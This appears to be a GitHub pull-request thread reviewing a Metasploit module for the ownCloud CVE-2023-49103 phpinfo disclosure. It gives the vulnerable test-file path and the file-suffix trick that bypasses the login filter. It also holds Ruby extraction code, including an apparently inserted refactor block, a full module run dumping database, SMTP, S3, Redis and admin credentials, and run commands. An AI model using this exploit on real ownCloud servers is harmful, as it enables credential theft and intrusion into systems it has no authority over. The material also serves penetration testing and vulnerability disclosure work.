ownCloud phpinfo reader (CVE-2023-49103) #18591
Conversation
CC @cfreal

### ENDFILE

The file path to add to the end of hte URL, which is used to bypass filtering. Defaults to `all` which will try `/.css`, `/.js`, `/.svg`,
Suggested change:
The file path to add to the end of the URL, which is used to bypass filtering. Defaults to `all` which will try `/.css`, `/.js`, `/.svg`,
    'Christian Fischer' # additional PoC work and research
  ],
  'References' => [
    [ 'URL', 'https://owncloud.com/security-advisories/disclosure-of-sensitive-credentials-and-configuration-in-containerized-deployments/'],
Suggested change (add a reference):
    [ 'URL', 'https://owncloud.com/security-advisories/disclosure-of-sensitive-credentials-and-configuration-in-containerized-deployments/'],
    [ 'URL', 'https://www.ambionics.io/blog/owncloud-cve-2023-49103-cve-2023-49105'],
if res.body =~ /#{field_regex('HOSTNAME')}/
  print_good("Hostname: #{::Regexp.last_match(1)}")
end
if res.body =~ /#{field_regex('HOME')}/
  print_good("Home: #{::Regexp.last_match(1)}")
end
if res.body =~ /#{field_regex('APACHE_DOCUMENT_ROOT')}/
  print_good("Server Root: #{::Regexp.last_match(1)}")
end
if res.body =~ /#{field_regex('PWD')}/
  print_good("PWD: #{::Regexp.last_match(1)}")
end
I think it would be nice to have this factored into a loop, with key/values.
I originally had it coded like that, but then trying to print the values out with nice labels and post-process groups together made it a little more unruly. Decided this, while repetitive and long-winded feeling, was better for organizing.
I was just in the middle of refactoring / making the change @jvoisin had suggested.
I was also experimenting with using an xpath instead of regex here. I know we usually prefer extracting data from response bodies using xpath for efficiency, especially when they're large, as is the case here - still testing.
@h00die I'll post a review either later today or early tomorrow.
Thanks for the great module @h00die. Hope you don't mind the commit I pushed up. I was originally trying to swap out the method field_regex for the following:

def field_xpath(field)
  "//tr[td[text() = '#{field} ']]/td[@class='v']/text()"
end
As I've always been under the impression that matching response bodies with xpath is supposed to be more efficient. After some benchmarking with a couple thousand module runs, I found that was not the case - possibly because I wasn't using a full xpath.
With field_regex the module took about 0.05 seconds to run on average.
With field_xpath the module took about 0.25 seconds to run on average.
The response body was so large the full xpaths were quite long and specific I didn't think it made sense to use them.
Anyways, the module was running perfectly before my commit and gives the same output after it's been applied:
msf6 > use auxiliary/gather/owncloud_phpinfo_reader
[*] Using auxiliary/gather/owncloud_phpinfo_reader
msf6 auxiliary(gather/owncloud_phpinfo_reader) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 auxiliary(gather/owncloud_phpinfo_reader) > run
[*] Running module against 127.0.0.1
[+] Found phpinfo page at: /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css
[+] Loot stored to: /Users/jheysel/.msf4/loot/20231204202617_default_127.0.0.1_owncloud.phpinfo_634937.txt
[+] License Key: 1122333
[+] Hostname: cd1977074298
[+] Home: /root
[+] Server Root: /var/www/owncloud
[+] PWD: /var/www/owncloud
[+] SMTP Username: smtp_username
[+] SMTP Password: smtp_password
[+] ownCloud Username: admin_username
[+] ownCloud Password: admin_password
[+] ownCloud Server Port: 8080
[+] DB Host: mariadb:3306
[+] DB Username: owncloud
[+] DB Password: owncloud
[+] DB Name: owncloud
[+] DB Type: mysql
[+] Redis Host: redis
[+] Redis Port: 6379
[+] ObjectStore Endpoint: https://s3.us-east-1.amazonaws.com
[+] ObjectStore Region: us-east-1
[+] ObjectStore Secret: secret123456
[+] ObjectStore Key: owncloud123456
[+] ObjectStore Bucket: owncloud
[+] Credentials
===========
Type Host Username Password Notes
---- ---- -------- -------- -----
S3 Object Store us-east-1 Key: owncloud123456 Secret: secret123456 Endpoint: https://s3.us-east-1.amazonaws.com, Bucket: owncloud
SMTP 127.0.0.1:25 smtp_username smtp_password
mysql 127.0.0.1:8080 owncloud owncloud
ownCloud 127.0.0.1:8080 admin_username admin_password
[*] Auxiliary module execution completed
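As an added illustration of the two points raised above (the key/value loop @jvoisin asked for, and the labelled, grouped output @h00die wanted to keep), here is a table-driven extractor run over a constructed phpinfo()-style fragment. This is example code written for this review, not the module's own code and not from any of the PR participants: `field_regex` is an assumed reconstruction of the module helper (the page does not show its body), the `OWNCLOUD_*` variable names and the group labels are assumptions, and the HTML is constructed sample input.

```ruby
require 'cgi'

# Constructed phpinfo()-style HTML fragment, not a real capture. phpinfo renders
# each environment variable as a row with the name in <td class="e"> (with a
# trailing space) and the value in <td class="v">; empty values render as
# <i>no value</i>. The OWNCLOUD_* names below are assumed for illustration.
SAMPLE_PHPINFO = <<~HTML
  <h2>Environment</h2>
  <table>
  <tr class="h"><th>Variable</th><th>Value</th></tr>
  <tr><td class="e">HOSTNAME </td><td class="v">cd1977074298</td></tr>
  <tr><td class="e">HOME </td><td class="v">/root</td></tr>
  <tr><td class="e">APACHE_DOCUMENT_ROOT </td><td class="v">/var/www/owncloud</td></tr>
  <tr><td class="e">OWNCLOUD_DB_HOST </td><td class="v">mariadb:3306</td></tr>
  <tr><td class="e">OWNCLOUD_DB_PASSWORD </td><td class="v">p&amp;ss&lt;word&gt;</td></tr>
  <tr><td class="e">OWNCLOUD_REDIS_HOST </td><td class="v"><i>no value</i></td></tr>
  </table>
HTML

# Field table: group name => { ENV_NAME => label }. Grouping and labels are
# assumed; the loop below replaces one if/print_good block per variable.
FIELD_GROUPS = {
  'host' => {
    'HOSTNAME' => 'Hostname',
    'HOME' => 'Home',
    'APACHE_DOCUMENT_ROOT' => 'Server Root',
    'PWD' => 'PWD'
  },
  'db' => {
    'OWNCLOUD_DB_HOST' => 'DB Host',
    'OWNCLOUD_DB_PASSWORD' => 'DB Password'
  },
  'redis' => {
    'OWNCLOUD_REDIS_HOST' => 'Redis Host'
  }
}.freeze

# Assumed shape of the module's field_regex helper (not shown on the page):
# anchor on the whole name cell so HOME cannot match inside HOSTNAME, and
# capture the value cell lazily so one row never swallows the next.
def field_regex(field)
  %r{<td class="e">#{Regexp.escape(field)} ?</td>\s*<td class="v">(.*?)</td>}m
end

# Extract every field in one group. Rows that are absent from the body are
# simply missing from the result; phpinfo's "<i>no value</i>" marker becomes
# an empty string, and HTML entities in values are decoded.
def extract_fields(body, fields)
  fields.each_with_object({}) do |(name, label), out|
    m = body.match(field_regex(name))
    next unless m
    raw = m[1].strip
    out[label] = raw == '<i>no value</i>' ? '' : CGI.unescapeHTML(raw)
  end
end

# Build the labelled, grouped report lines. Groups with no hits are skipped so
# the output stays readable on deployments that expose only some variables.
def report(body, groups = FIELD_GROUPS)
  groups.flat_map do |group, fields|
    found = extract_fields(body, fields)
    next [] if found.empty?
    ["[#{group}]"] + found.map { |label, value| "#{label}: #{value.empty? ? '(no value)' : value}" }
  end
end

if __FILE__ == $PROGRAM_NAME
  puts report(SAMPLE_PHPINFO)
end
```

Run it directly to see the grouped lines; in a module the `report` output would feed `print_good` and the credential-reporting calls instead of `puts`. The same extractor is also a cheap way for an operator to audit their own container's phpinfo output and confirm which variables it actually exposes before deciding what to rotate.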
I'm good with it! I was trying to leverage speed of completeness since this is in the headlines. Glad it's working! Ship it 🚢
Release Notes: This PR adds an auxiliary module for CVE-2023-49103 which can extract sensitive environment variables from ownCloud targets including ownCloud, DB, Redis, SMTP and S3 credentials.

Docker containers of ownCloud compiled after February 2023, which have version 0.2.0 before 0.2.1 or 0.3.0 before 0.3.1 of the app `graph` installed, contain a test file which prints `phpinfo()` to an unauthenticated user. A post file name must be appended to the URL to bypass the login filter. Docker may export sensitive environment variables including ownCloud, DB, redis, SMTP, and S3 credentials, as well as other host information.
use auxiliary/gather/owncloud_phpinfo_reader
set rhost [ip]
run